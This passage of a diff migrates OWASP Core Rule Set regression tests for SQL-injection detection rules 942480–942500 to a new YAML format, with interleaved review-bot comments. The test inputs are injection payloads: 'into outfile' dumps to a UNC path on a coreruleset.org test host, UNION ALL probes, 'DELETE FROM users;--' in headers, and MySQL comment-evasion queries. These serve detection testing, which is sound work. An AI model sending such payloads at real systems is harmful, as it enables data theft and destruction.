expect_ids: [942480] + - test_id: 3 desc: "Data dump using 'into outfile'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=EmptyValue into outfile '\\\\\\\\jviw6aoxefbjk0luyi6oiwjv5unittests.coreruleset.org\\\\xct'; --" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=EmptyValue into outfile '\\\\\\\\jviw6aoxefbjk0luyi6oiwjv5unittests.coreruleset.org\\\\xct'; --" + version: HTTP/1.0 + output: + log: + expect_ids: [942480] + - test_id: 4 desc: "Data dump using 'into outfile'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=/config.ini' into outfile '\\\\\\\\il7vw9ew4e1iazbtohwn8v9uvl1hunitetests.coreruleset.org\\\\yxq'; --" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=/config.ini' into outfile '\\\\\\\\il7vw9ew4e1iazbtohwn8v9uvl1hunitetests.coreruleset.org\\\\yxq'; --" + version: HTTP/1.0 + output: + log: + expect_ids: [942480] + - test_id: 5 desc: "SQL injection using 'UNION ALL" stages: - - stage: - input: - dest_addr: 
127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=0.3480567293179807' UNION ALL select NULL --" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=0.3480567293179807' UNION ALL select NULL --" + version: HTTP/1.0 + output: + log: + expect_ids: [942480] + - test_id: 6 desc: "SQL injection using 'UNION ALL" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=config.ini\") UNION ALL select NULL --" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=config.ini\") UNION ALL select NULL --" + version: HTTP/1.0 + output: + log: + expect_ids: [942480] + - test_id: 7 desc: "SQL injection using 'UNION ALL" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=CRS) UNION ALL select NULL --" - version: HTTP/1.0 - output: - log_contains: id "942480" - - 
test_title: 942480-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=CRS) UNION ALL select NULL --" + version: HTTP/1.0 + output: + log: + expect_ids: [942480] + - test_id: 8 desc: "SQL injection using 'UNION ALL" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=CRS3\") UNION ALL select NULL --" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=CRS3\") UNION ALL select NULL --" + version: HTTP/1.0 + output: + log: + expect_ids: [942480] + - test_id: 9 desc: "SQL injection using 'overlay(...placing..)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=overlay(password%20placing%20%27%27%20from%201%20for%200)::int" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: 
"/get/index.php?id=overlay(password%20placing%20%27%27%20from%201%20for%200)::int" + version: HTTP/1.0 + output: + log: + expect_ids: [942480] + - test_id: 10 desc: "SQL injection in User-Agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: DELETE FROM users;-- - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: DELETE FROM users;-- + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [942480] + - test_id: 11 desc: "SQL injection in arbitrary header" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - SomeHeader: DELETE FROM users;-- - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + SomeHeader: DELETE FROM users;-- + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [942480] + - test_id: 12 desc: "SQL injection using 'overlay(...placing..) 
with newlines" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=overlay(password%0aplacing%0a%27%27%0afrom%201%20for%200)::int" - version: HTTP/1.0 - output: - log_contains: id "942480" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=overlay(password%0aplacing%0a%27%27%0afrom%201%20for%200)::int" + version: HTTP/1.0 + output: + log: + expect_ids: [942480] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml index 0c5c8c42b..910071cd0 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml 
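Review bot: In tests 10 and 11 the injected header payloads are plain scalars, `User-Agent: DELETE FROM users;--` and `SomeHeader: DELETE FROM users;--`, whereas every other header string in this file is quoted; since these values are by design adversarial strings, leaving them unquoted means a future edit that introduces ` #`, `: ` or a leading indicator would be retyped or truncated by the YAML parser rather than sent to the server, and the regression test would weaken without any failure. Quoting them, `User-Agent: "DELETE FROM users;--"`, removes that exposure. The file is also internally inconsistent in that tests 1–2 use `dest_addr: "127.0.0.1"` and `Host: "localhost"` while tests 3–12 use the plain forms; either is valid, but one style per file is preferable.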
@@ -1,381 +1,379 @@ --- meta: author: "Christoph Hansen, azurit" - description: None - enabled: true - name: 942490.yaml +rule_id: 942490 tests: - - test_title: 942490-1 + - test_id: 1 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=%22%60%20%2A%20123" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=%22%60%20%2A%20123" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 2 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "' ', 10" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "' ', 10" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 3 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - 
method: POST - port: 80 - uri: "/post" - data: "'', '', '', '', '', '', '', '', 13" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "'', '', '', '', '', '', '', '', 13" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 4 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "`>65" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "`>65" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 5 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay='1001'='10" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay='1001'='10" + version: 
HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 6 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "\"2562*23" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "\"2562*23" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 7 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=\":[\"00" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=\":[\"00" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 8 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=`>6fbdec2" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 
942490-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=`>6fbdec2" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 9 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay='][0]]), strtolower($b[$GLOBALS['" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay='][0]]), strtolower($b[$GLOBALS['" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 10 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=', 2, 1" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=', 2, 1" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 11 desc: "classic SQL injection probings 3/3" stages: - - 
stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "`>9e7" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "`>9e7" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 12 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=\":\"65" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=\":\"65" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 13 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay='\\2nq5" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay='\\2nq5" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 14 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=` < 0) AND `" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=` < 0) AND `" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 15 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay='0:0:6" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay='0:0:6" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 16 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "\":60" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "\":60" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 17 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=\">%5 - type_submit_reset_5" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=\">%5 - type_submit_reset_5" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 18 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "\":35" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "\":35" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 19 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay='3085'='30" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay='3085'='30" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 20 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "\":\"[0,\\x22" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "\":\"[0,\\x22" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 21 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay='16/17" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay='16/17" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 22 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "\";}7b6" - version: HTTP/1.0 - output: - log_contains: id "942490" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "\";}7b6" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml index 8c92f874c..54e148077 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml 
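Review bot: All twenty-two tests in this hunk carry the identical `desc: "classic SQL injection probings 3/3"`, so a go-ftw failure report names a test_id but says nothing about which payload shape regressed. Since the migration already rewrites every test entry, this is the moment to give each a payload-specific description, e.g. for test 4 `desc: "backtick followed by comparison operator"` and for test 9 `desc: "PHP array/GLOBALS fragment after closing quote"`. Test 1 is also the only entry whose body is percent-encoded (`var=%22%60%20%2A%20123`) while the rest send raw quotes and backticks; if that is deliberate (exercising the urlDecode path) a one-line comment saying so would stop a future cleanup from normalising it.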
@@ -2,86 +2,85 @@ meta: author: "Franziska Buehler, Max Leske, azurit" description: "Detection of MySQL injection evasion attempts using special comments" - enabled: true - name: 942500.yaml +rule_id: 942500 tests: - - test_title: 942500-1 + - test_id: 1 desc: "Use of portability comment (/*!...*/) as evasion technique" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?id=9999+or+{if+length((/*!5000select+username/*!50000from*/user+where+id=1))>0}" - version: HTTP/1.0 - output: - log_contains: id "942500" - - test_title: 942500-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?id=9999+or+{if+length((/*!5000select+username/*!50000from*/user+where+id=1))>0}" + version: HTTP/1.0 + output: + log: + expect_ids: [942500] + - test_id: 2 desc: "Use of portability comment (/*!...*/) as evasion technique, with space before !" 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?id=9999+or+{if+length((/*+!5000select+username/*!50000from*/user+where+id=1))>0}" - version: HTTP/1.0 - output: - log_contains: id "942500" - - test_title: 942500-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?id=9999+or+{if+length((/*+!5000select+username/*!50000from*/user+where+id=1))>0}" + version: HTTP/1.0 + output: + log: + expect_ids: [942500] + - test_id: 3 desc: "Use of optimizer hints (/*+...*/) as evasion technique" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - 